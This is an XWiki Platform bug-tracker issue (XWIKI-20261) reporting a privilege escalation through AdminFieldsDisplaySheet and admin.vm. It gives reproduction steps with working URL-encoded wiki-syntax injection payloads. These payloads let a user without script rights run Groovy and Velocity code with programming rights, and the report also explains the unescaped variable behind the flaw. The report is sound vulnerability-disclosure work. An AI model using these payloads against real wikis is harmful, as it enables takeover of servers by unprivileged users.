Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20261

Privilege escalation (PR) from account/view through AdminFieldsDisplaySheet and admin.vm

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      1. Add
        {{template name="admin.vm" output="false"/}}
        
        {{display reference="XWiki.AdminFieldsDisplaySheet"/}}

        to any place where you can use wiki syntax like the "about" section in your user profile as a user without programming or script rights.

      2. Add the URL parameter section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D.

      Expected results:

      Some errors or nothing is displayed.

      Actual result:

      hello from groovy! followed by some raw HTML is displayed.

      This shows that a user without script or programming rights can execute a Groovy macro and thus in principle gain programming rights. There is a caveat which is that the executed code is first converted to lowercase. While this means a lot of the API is not available there are workarounds like using

      {{velocity}}#evaluate($request.exploit){{/velocity}}

      as main exploit code and thus executing the content of a request parameter. A fully working set of parameters would be

      section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%2Crequest.exploit%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&exploit=Hello+from+Velocity%21+%24hasProgramming

      which results in the output Hello from Velocity! true, thus showing that we have programming rights in Velocity and no more restrictions. Without escaping, the corresponding parameter values are

      {{/html}} {{async async="true" cached="false" context="doc.reference,request.exploit"}}{{velocity}}#evaluate($request.exploit){{/velocity}}{{/async}}

      for section and

      Hello from Velocity! $hasProgramming

      for exploit.

      This exploit is possible because XWiki.AdminFieldsDisplaySheet outputs $section (and other variables) without further escaping, thus allowing XWiki syntax injection and admin.vm can be abused to set $section from the section request parameter.

      Attachments

        Issue Links

          Activity

            People

              mleduc Manuel Leduc
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: